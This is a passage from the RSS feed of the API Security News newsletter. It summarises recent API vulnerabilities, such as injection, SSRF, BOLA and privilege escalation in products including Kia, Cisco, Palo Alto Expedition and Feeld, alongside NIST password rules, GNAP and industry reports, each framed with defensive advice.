<p style="font-weight: 400;"><span style="font-weight: 400;">API keys are particularly prone to this type of abuse when used for purposes other than identifying an API client. You can read more about best practices for API token management in this (still very relevant) 2018 </span><a href="https://42crunch.com/token-management-best-practices/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">.</span></p>
<h2><span style="font-weight: 400;">Industry Report: Is your API Gateway Secure by Default</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Secure by default is a product development approach that shifts the burden of security from the user to the product manufacturer. </span><a href="https://www.cisa.gov/sites/default/files/2023-04/principles_approaches_for_security-by-design-default_508_0.pdf" target="_blank" rel="noopener"><span style="font-weight: 400;">According</span></a><span style="font-weight: 400;"> to the U.S. Cybersecurity and Infrastructure Security Agency (CISA):</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Secure-by-Default” means products are resilient against prevalent exploitation techniques out of the box without additional charge. These products protect against the most prevalent threats and vulnerabilities without end-users having to take additional steps to secure them.</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In contrast, a recent </span><a href="https://www.trendmicro.com/vinfo/us/security/news/security-technology/exploring-the-depths-of-api-security" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> from Trend Micro examines the default settings of two popular API gateway solutions, APISIX and Kong, and identifies a number of critical vulnerabilities that could be exploited to compromise the API gateway platform, including:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Use of default admin passwords</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Passwords stored on the platform in clear text </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Security tokens exposed in log files</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Platform administration access exposed on all network interfaces</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">In addition to the insecure defaults, some API gateways support community plugins to extend the functionality of the platform. Installing a community plugin can introduce new vulnerabilities into the API gateway and compromise the protections it’s designed to provide for your APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For example, API gateways typically implement authorization protocols such as OAuth and OpenID Connect. API teams can offload the burden of implementing these protocols to an API gateway, allowing the team to simply configure authorization flows for their APIs instead of coding from scratch. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, if the API gateway itself is vulnerable to an attack due to insecure default settings or from installing a vulnerable plugin, the authorization controls protecting your APIs may be affected. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report examines these and other security issues with the APISIX and Kong gateways in particular, though it can serve as a useful guide for reviewing your own API gateway deployments, which may suffer from similar vulnerabilities. </span></p>
<h2><span style="font-weight: 400;">Industry News: An RFC for GNAP</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Speaking of OAuth, have you heard of GNAP? </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">GNAP (the Grant Negotiation and Authorization Protocol) was recently published by the IEFT as </span><span style="font-weight: 400;">RFC9635</span><span style="font-weight: 400;">. </span><a href="https://justinsecurity.medium.com/gnap-a-conversation-of-authorization-5b603d850fe9" target="_blank" rel="noopener"><span style="font-weight: 400;">According</span></a><span style="font-weight: 400;"> to one of its authors, Justin Richer, GNAP is the result of an investigation into the shortcomings of the popular OAuth protocol for delegated authorization, and is already used in scenarios such as online payments and key management. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Reading some of the documentation, it looks really promising. </span><a href="https://www.rfc-editor.org/rfc/rfc9635.html#vs-oauth2" target="_blank" rel="noopener"><span style="font-weight: 400;">Appendix A</span></a><span style="font-weight: 400;"> provides the TL;DR you’re looking for to understand the use cases where GNAP can be better suited than OAuth.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The section on ‘consent and authorization flexibility’ caught my attention.</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“OAuth 2.0 generally assumes the user has access to a web browser. The type of interaction available is fixed by the grant type, and the most common interactive grant types start in the browser… GNAP allows a client instance to list different ways that it can start and finish an interaction, and these can be mixed together as needed for different use cases. GNAP interactions can use a browser, but they don&#8217;t have to”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I recently worked on building a set of APIs for a demo application, and wanted to add an OAuth delegated authorization flow. Figuring out which grant type to use quickly became a challenge. In the end, nothing really fitted neatly (among other things I wanted to avoid using a browser). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The kind of flexibility that GNAP claims to offer could be a great benefit to API developers, and simplify the building of bespoke authorization solutions.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Injection attacks on Palo Alto Expedition platform</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Palo Alto Networks Expedition is a tool that allows users to migrate firewall configurations from other vendors, such as Checkpoint or Cisco, to a Palo Alto Networks PAN-OS firewall. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Two critical vulnerabilities were recently discovered in the platform API that allow both command injection and SQL injection attacks. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A detailed </span><a href="https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> from Horizon3.ai includes an account of their research as well as a proof of concept demonstrating how to manipulate API input parameters to gain unauthorized database access or execute malicious commands on the Expedition system.</span></p>
<p style="font-weight: 400;"><a href="https://owasp.org/Top10/A03_2021-Injection/" target="_blank" rel="noopener"><span style="font-weight: 400;">Injection attacks</span></a><span style="font-weight: 400;"> are a common way for threat actors to find and exploit API vulnerabilities, by sending malformed data in parameters or headers that are not properly validated by the API. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">SQL injection, command injection, and path traversal are all examples of injection attacks.   </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Palo Alto Expedition users are </span><a href="https://security.paloaltonetworks.com/PAN-SA-2024-0010" target="_blank" rel="noopener"><span style="font-weight: 400;">advised</span></a><span style="font-weight: 400;"> to update to v1.2.96 or later. Also, all firewall usernames, passwords, and API keys processed by Expedition should be rotated after updating.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API Incident on Trend Micro’s Cloud Edge</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Cloud Edge is a unified threat management solution from Trend Micro. According to a </span><a href="https://cybersecuritynews.com/trend-micro-code-execution-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> from Cyber Security News, a vulnerability was discovered in a Cloud Edge REST API that exposed the appliance to command injection attacks. A successful attack allows a hacker to execute malicious code on the appliance in the context of root. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Similar to the Palo Alto vulnerability mentioned earlier, the vulnerable Cloud Edge REST API accepts user-supplied input without proper validation and uses the input to execute a system call. The lack of input validation creates a vulnerability through which the attacker can control the commands executed on the appliance.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Cybersecurity agencies such as CISA and the FBI in the United States are </span><a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-eliminating-os-command-injection-vulnerabilities#:~:text=How%20Can%20Software%20Manufacturers%20Prevent%20OS%20Command%20Injection%20Vulnerabilities%3F" target="_blank" rel="noopener"><span style="font-weight: 400;">urging</span></a><span style="font-weight: 400;"> software development teams to adopt secure-by-design principles to prevent common vulnerabilities such as command injection during the design and development phases. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Trend Micro strongly encourages users to update to the latest version of the product.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: How to identify SSRF vulnerabilities</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I recently noticed two incidents of server-side request forgery (SSRF) that are worth looking at to illustrate how the vulnerability can occur in your API code and how to avoid it.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API can be vulnerable to SSRF if it retrieves resources from a remote location based on a user-provided location (e.g., a URL, hostname, or subdomain). The API should carefully inspect and validate user input to ensure that it does not point to an unexpected location.</span></p>
<p><strong>PostHog</strong></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">PostHog is an open source product analytics platform used by product development teams. A security </span><a href="https://www.zerodayinitiative.com/advisories/ZDI-24-1383/" target="_blank" rel="noopener"><span style="font-weight: 400;">advisory</span></a><span style="font-weight: 400;"> reported a Server Side Request Forgery vulnerability discovered in the PostHog platform API, which was quickly patched by the team. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The root cause and subsequent fix can be seen from the associated </span><a href="https://github.com/PostHog/posthog/pull/25388/files" target="_blank" rel="noopener"><span style="font-weight: 400;">code changes</span></a><span style="font-weight: 400;">. The ‘subdomain’ property is set by user-supplied data in an API request. A malicious user could set an invalid subdomain value and cause the API to access resources in an unexpected location. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The fix, as demonstrated by the code change, was to set constraints on the input value, thereby blocking invalid or malicious input with a HTTP 400 response.</span></p>
<p><strong>Plane</strong></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Plane is an open source project management tool for running development cycles and managing product roadmaps. An SSRF vulnerability was recently reported on an image retrieval service on the platform. A </span><a href="https://github.com/makeplane/plane/security/advisories/GHSA-39gx-38xf-c348" target="_blank" rel="noopener"><span style="font-weight: 400;">POC</span></a><span style="font-weight: 400;"> demonstrates how an overly permissive wildcard pattern (“**”) on a ‘hostname’ input property was the root cause of the vulnerability. This allowed a user to set any value for the hostname. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This SSRF vulnerability was </span><a href="https://github.com/makeplane/plane/pull/5452/files" target="_blank" rel="noopener"><span style="font-weight: 400;">fixed</span></a><span style="font-weight: 400;"> by removing the permissive pattern and preventing resource retrieval from arbitrary remote sources. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Watch out for similar SSRF issues in your own APIs.</span></p>
<h2><span style="font-weight: 400;">Webinar: Mitigate OWASP API Risks through Security by Design</span></h2>
<p><span style="font-weight: 400;">The OWASP Top 10 API Security Risk list provides a clear roadmap of the most common and dangerous vulnerabilities that can compromise your APIs. I’ll be demonstrating in this webinar how to incorporate the OWASP guidelines into your security initiative to help build secure, resilient APIs by design.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://42crunch.com/mitigate-owasp-api-risks-through-security-by-design/" target="_blank" rel="noopener">Register</a></span></p>
<p>The post <a href="https://apisecurity.io/issue-257-internet-archive-under-attack-api-gateways-insecure-by-default-owasp-injection-attacks/">Issue 257: Internet Archive under attack, API Gateways insecure by default, OWASP injection attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 256: Privilege escalation bugs in Kia vehicles, Cisco and Gov APIs, NIST’s new rules for password security</title>
		<link>https://apisecurity.io/issue-256-privilege-escalation-bugs-in-kia-vehicles-cisco-and-gov-apis-nists-new-rules-for-password-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 10 Oct 2024 16:07:06 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11229</guid>

					<description><![CDATA[<p>This week, we review three different cases of API authorization and privilege escalation vulnerabilities, each of which is a wake-up call for API teams. We examine NIST updates on password security guidelines and share findings from an industry survey on API security and an upcoming OWASP API Top 10 webinar.   Also this week we [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-256-privilege-escalation-bugs-in-kia-vehicles-cisco-and-gov-apis-nists-new-rules-for-password-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-256-privilege-escalation-bugs-in-kia-vehicles-cisco-and-gov-apis-nists-new-rules-for-password-security/">Issue 256: Privilege escalation bugs in Kia vehicles, Cisco and Gov APIs, NIST’s new rules for password security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we review three different cases of API authorization and privilege escalation vulnerabilities, each of which is a wake-up call for API teams. We examine NIST updates on password security guidelines and share findings from an industry survey on API security and an upcoming OWASP API Top 10 webinar.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Also this week we celebrate APISecurity.io’s 6th anniversary! Since publishing Issue #1 on October 11, 2018, the newsletter has become a trusted resource for staying up-to-date on the latest threats, best practices, innovations, and solutions in the API security space. Thank you to all subscribers for your continued feedback and support as we work to provide timely and valuable content to drive the conversation around API security. </span></p>
<h2><span style="font-weight: 400;">Industry News: NIST updates the rules for password security</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the latest revision of </span><a href="https://pages.nist.gov/800-63-4/sp800-63b.html#password" target="_blank" rel="noopener"><span style="font-weight: 400;">Special Publication 800-63 Digital Identity Guidelines</span></a><span style="font-weight: 400;">, the U.S. National Institute of Standards and Technology (NIST) updated the rules for password security, including changing the guidelines for password complexity and composition from recommendations (should, should not) to requirements (shall, shall not).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Forcing users to create complex passwords that include letters, numbers, and special characters can be counterproductive when it doesn’t result in strong and unpredictable passwords (the infamous “Password1!”). This was acknowledged in the original NIST publication in 2017, but the latest update now establishes clear requirements that password verifiers must not impose these composition rules on users.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">You can read the rationale behind the changes to password strength in the </span><a href="https://pages.nist.gov/800-63-4/sp800-63b.html#appA" target="_blank" rel="noopener"><span style="font-weight: 400;">Appendix</span></a><span style="font-weight: 400;">. One point from the summary I think is worth noting for development teams: </span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Furthermore, other mitigations such as blacklists, secure hashed storage, and rate limiting are more effective at preventing modern brute-force attacks. Therefore, no additional complexity requirements are imposed.”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So while the burden of complexity is being lifted off the end user (a good thing), these changes put an additional responsibility on development teams to ensure robust protections against brute force attacks on the functions and APIs that perform password verification.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Kia vehicle’s insecure partner API hacked </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A </span><a href="https://samcurry.net/hacking-kia" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by researcher Sam Curry describes how a team of ethical hackers discovered vulnerabilities in Kia’s APIs that allowed them to take over user accounts and remotely control vehicles. In <a style="font-weight: 400;" href="https://apisecurity.io/issue-253-breached-companies-face-litigation-sql-injection-in-cisco-apis-api-security-for-automotive-finance/" target="_blank" rel="noopener">issue 253</a> we referenced an industry white paper from VicOne on this very topic.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The main weakness was a dealer registration endpoint without any identification or verification checks, so any online user could register as a Kia dealer. A dealer has an elevated role, or partnership, with the vehicle manufacturer, and so is granted privileged access to systems and API services. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So once registered as a fake Kia dealer, the research team was able to use Kia’s dealer APIs to query vehicle owner’s personal information, add an attacker as the primary owner of the vehicle, and ultimately execute remote commands to control the vehicle. A video demonstration is included in the report.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Partner APIs typically provide privileged access to services and data and so need additional layers of security, and testing, around the registration process. Imagine how much harder it would be to hack this system if dealer registration was limited to a whitelist of approved email domains?</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Or better yet, use mutual TLS so that dealer registration is only possible from a particular office or terminal. Don’t make it easy for hackers. If they want unauthorized access to partner APIs, force them to break glass and climb through some windows!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report also highlights that obfuscation offers little protection. Just because your APIs and endpoints are hidden and undocumented doesn’t mean hackers won’t find them. The process by which this team discovered the dealer registration endpoint is a valuable lesson for API teams to heed.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Great writeup by Sam Curry. Essential reading for API teams.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Broken Authorization in Cisco Nexus Platform APIs</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing on the topic of privileged access and vulnerable APIs, a Cisco </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ndhs-uaapi-Jh4V6zpN#fs" target="_blank" rel="noopener"><span style="font-weight: 400;">security advisory</span></a><span style="font-weight: 400;"> highlights several REST API vulnerabilities that allow a low-privileged user to access administrator-level services on the Cisco Nexus Dashboard.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Cisco Nexus Dashboard is a centralized management platform for provisioning, managing, and operating data center networks. According to the advisory, the vulnerabilities involve missing or insufficient authorization checks on the REST API, which could allow an attacker to upload malicious files and read or delete sensitive data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Incidents of attackers gaining privileged access to API services are often exploits of broken function level authorization (BFLA). According to </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa5-broken-function-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP</span></a><span style="font-weight: 400;">, BFLA vulnerabilities are common and easy to exploit and can lead to data disclosure and service disruption.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guidelines to prevent BFLA suggest adopting a zero-trust approach where access is denied by default, and requiring specific roles or permissions before access is granted. BFLA specific tests can also be run as part of automated continuous testing, to check if non-authorized users can gain access to privileged APIs.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Privilege escalation flaw in e-filing platform API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://www.securityweek.com/court-data-exposed-by-vulnerabilities-in-software-used-by-us-government-researcher/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> in SecurityWeek describes how cybersecurity researcher Jason Parker claims to have discovered critical vulnerabilities in a number of public platforms used in the United States’ justice systems.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In one report, the researcher describes an API vulnerability discovered in the Granicus e-filing platform that allows a regular user to elevate their access levels. The e-filing system is used to submit legal documents to state courts. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to the researcher’s </span><a href="https://github.com/qwell/disclosures/blob/main/README-2024-09-27-granicus-efiling.md" target="_blank" rel="noopener"><span style="font-weight: 400;">disclosure document</span></a><span style="font-weight: 400;">, the vulnerability is exploited by sending an API request to the platform with a special “TypeCode” property in the payload. If the TypeCode matched a value for a privileged account on the system, like a court or administrator account, the user&#8217;s access level was escalated.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This has the typical characteristics of an API mass assignment vulnerability, or a </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">Broken Object Property Level Authorization</span></a><span style="font-weight: 400;"> (BOPLA) vulnerability in the OWASP API Security Top 10 list. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">BOPLA exploits can cause a range of different adverse effects, from crashing a server to escalating a user&#8217;s role and access permissions. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API should be securely designed to constrain the properties it accepts to only those that are expected. Additional properties should be rejected by default, to avoid unexpected behavior in the API. </span></p>
<h2><span style="font-weight: 400;">Industry Report: 30% of public APIs are completely unprotected</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">F5 recently published a supplemental </span><a href="https://www.f5.com/go/report/state-of-application-strategy-report-api-security" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> titled “The Secret Life of APIs” summarizing the views of API decision makers, primarily C-level, on their current API security posture.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">From what I’ve read, the results range from suspiciously optimistic to shockingly pessimistic. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">On the optimistic side:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">80% of organizations claim to begin API security in the API design phase</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">59% say they incorporate security at every stage of the API lifecycle</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Security-by-design is the recommended approach to API security. However the devil is in the details, and some of the other statistics that emerge from the report suggest that teams are struggling to get some of the basics right:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">More than 30% of public APIs use the unsecure HTTP protocol</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Two-thirds of organizations leave their operational workflow APIs unsecured</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report also highlights how AI solutions are enabled by API-based integrations, so AI solutions will continue to be vulnerable until APIs are secured. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The take-away message from the report is that organizations must adopt a zero trust model for API security, to be implemented throughout the API lifecycle from development to operational phases. This is a recurring conclusion in industry reports for achieving effective API security.</span></p>
<h2><span style="font-weight: 400;">Webinar: Mitigate OWASP API risks through security-by-design</span></h2>
<p><a href="https://42crunch.com/mitigate-owasp-api-risks-through-security-by-design/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-11230" src="https://apisecurity.io/wp-content/uploads/2024/10/Webinar-Mitigating-OWASP-Featured-image-300x173.png" alt="" width="598" height="345" srcset="https://apisecurity.io/wp-content/uploads/2024/10/Webinar-Mitigating-OWASP-Featured-image-300x173.png 300w, https://apisecurity.io/wp-content/uploads/2024/10/Webinar-Mitigating-OWASP-Featured-image-768x442.png 768w, https://apisecurity.io/wp-content/uploads/2024/10/Webinar-Mitigating-OWASP-Featured-image.png 835w" sizes="auto, (max-width: 598px) 100vw, 598px" /></a></p>
<p>The OWASP Top 10 API Security Risk list provides a clear roadmap of the most common and dangerous vulnerabilities that can compromise your APIs. <a href="https://42crunch.com/mitigate-owasp-api-risks-through-security-by-design/" target="_blank" rel="noopener">In this webinar</a>, you will learn how to incorporate the OWASP guidelines into your security initiatives for software development to help build secure, resilient APIs by design. This session will offer practical insights to enhance the security of your applications.</p>
<p><strong>Key takeaways include?</strong></p>
<ul>
<li>Why adopt security by design?</li>
<li>How to leverage OWASP guidelines for API development</li>
<li>How to get developers invested in the security of their APIs</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-256-privilege-escalation-bugs-in-kia-vehicles-cisco-and-gov-apis-nists-new-rules-for-password-security/">Issue 256: Privilege escalation bugs in Kia vehicles, Cisco and Gov APIs, NIST’s new rules for password security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 255: Versa Director API flaw, Feeld BOLA vulnerabilities, logic flaw risks aircraft disaster</title>
		<link>https://apisecurity.io/issue-255-versa-director-api-flaw-feeld-bola-vulnerabilities-logic-flaw-risks-aircraft-disaster/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 26 Sep 2024 13:00:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11222</guid>

					<description><![CDATA[<p>This week, we look at API security vulnerabilities discovered in Versa Director and in dating app Feeld. We share insights from ethical API hackers on how they find API vulnerabilities and bugs in mobile apps. We have two separate reports on industry trends and priorities for API security in 2024, and a how-to article on [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-255-versa-director-api-flaw-feeld-bola-vulnerabilities-logic-flaw-risks-aircraft-disaster/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-255-versa-director-api-flaw-feeld-bola-vulnerabilities-logic-flaw-risks-aircraft-disaster/">Issue 255: Versa Director API flaw, Feeld BOLA vulnerabilities, logic flaw risks aircraft disaster</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we look at API security vulnerabilities discovered in Versa Director and in dating app Feeld. We share insights from ethical API hackers on how they find API vulnerabilities and bugs in mobile apps. We have two separate reports on industry trends and priorities for API security in 2024, and a how-to article on API discovery. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Networks exposed to Versa Director API flaw</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to a </span><a href="https://thecyberexpress.com/versa-director-flaw-api-attacks-token-theft/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> by The Cyber Express, a vulnerability was recently discovered in Versa Director, a platform used by service providers to manage network configurations. The vulnerability is caused by improper input validation in a REST API exposed by the platform.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs must be developed with secure coding practices to properly validate all user input. Without this basic security check, an attacker can carefully craft input that is not expected by the API and can lead to unintended consequences.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case, an attacker could inject an invalid property into a GET request to the vulnerable API, which would cause an unintentional leak of authentication tokens of other users logged into the system. Armed with the valid tokens of other users, the attacker could then send additional API requests with the permissions and privileges of those other users.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recommended workaround is to use a WAF or API gateway to block all traffic to vulnerable API endpoints. However, a more granular API firewall would only block API requests that include invalid properties, to protect the system from malicious requests without impacting all users.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: BOLA undermines privacy in Feeld dating app</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Fortbridge research team has </span><a href="https://fortbridge.co.uk/research/feeld-dating-app-nudes-data-publicly-available/" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> a series of API vulnerabilities in the dating app Feeld, demonstrating the real-world consequences of broken object-level authorization (BOLA). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">BOLA tops the </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP Top 10</span></a><span style="font-weight: 400;"> ranking for API security. It is an extremely common vulnerability in API development and it is also easy to exploit.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These BOLA vulnerabilities allow a malicious user to access other users&#8217; private photos and chat groups. In one example, the team demonstrated how they were even able to modify other users’ chat messages. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To find these vulnerabilities, the research team was able to monitor the API traffic sent by the mobile dating app. They noticed that the app sends unique IDs to the API server whenever they accessed a resource such as a photo or chat message.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By manipulating the ID sent to the API server, the team was able to gain unauthorized access to other user’s photos and chat messages. This showed that the API was not checking whether a logged-in user was authorized to access a particular resource. In other words, the API’s authorization is broken at the resource or object level. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Mobile apps are particularly vulnerable to BOLA attacks if frontend and backend development teams are not clued in to the risks. For hackers who know how to look inside a mobile app to monitor and manipulate API traffic, BOLA is often a very effective method of attack.</span></p>
<h2><span style="font-weight: 400;">Article: How hackers access the APIs behind your mobile app</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">I recently read an interesting </span><a href="https://danaepp.com/hacking-modern-android-apps-with-burpsuite" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> by Dana Epp on how to hack mobile apps and APIs. It’s basically a step by step technical guide on how to connect the Burp Suite tool with an Android device in order to access and manipulate a mobile app&#8217;s API traffic. It also explains how to circumvent the latest Android security features as part of the setup. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guide is technically detailed and well illustrated, making it easy to follow and set up your own mobile hacking environment. So it’s a great share for the benefit of other API enthusiasts. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One thing that stood out to me while reading this guide is that even though security is continually improving in mobile devices, software and hardware, hackers (ethical or otherwise) will always find a way to gain access. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">What does this mean for mobile app development and security teams? </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Teams must assume the app’s API traffic will be exposed and manipulated by hackers to probe and test for vulnerabilities. For that reason, API developers should follow secure API coding practices to remove or mitigate common risks, and consistently authorize all user requests to return only data that the user is specifically authorized to access. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Also, API testers will need to be just as creative and diligent as hackers to find ways to uncover API vulnerabilities, before mobile apps go into production and become prime targets.</span></p>
<h2><span style="font-weight: 400;">Article: API Discovery &#8211; How to Achieve a complete API Inventory</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a recent </span><a href="https://42crunch.com/discovering-your-apis-how-to-achieve-a-complete-api-inventory/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">, Axel Grosse of 42Crunch discusses the challenges enterprise security teams face in establishing a comprehensive inventory of their API estate. API discovery is often misinterpreted as being API security and not just a facet of a bigger picture as this article explains. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the rush to find quick fixes, teams often overlook the fact that existing API knowledge and records are already available within the organization. It’s just a matter of knowing where to look and who to contact for directions.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Luckily, Axel has you covered! The article provides guidance for security teams on how and where exactly to begin API discovery. And, most importantly for API security, it asks the question, “now what?”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you’re starting on the API discovery journey, or if you’re struggling with the “now what?” question, this article will give you some food for thought. </span></p>
<h2><span style="font-weight: 400;">Report: API vulnerabilities costing companies up to $87 billion</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">An industry analysis of over 161,000 cybersecurity incidents reveals some interesting statistics about the risks and potential costs associated with API vulnerabilities. </span></p>
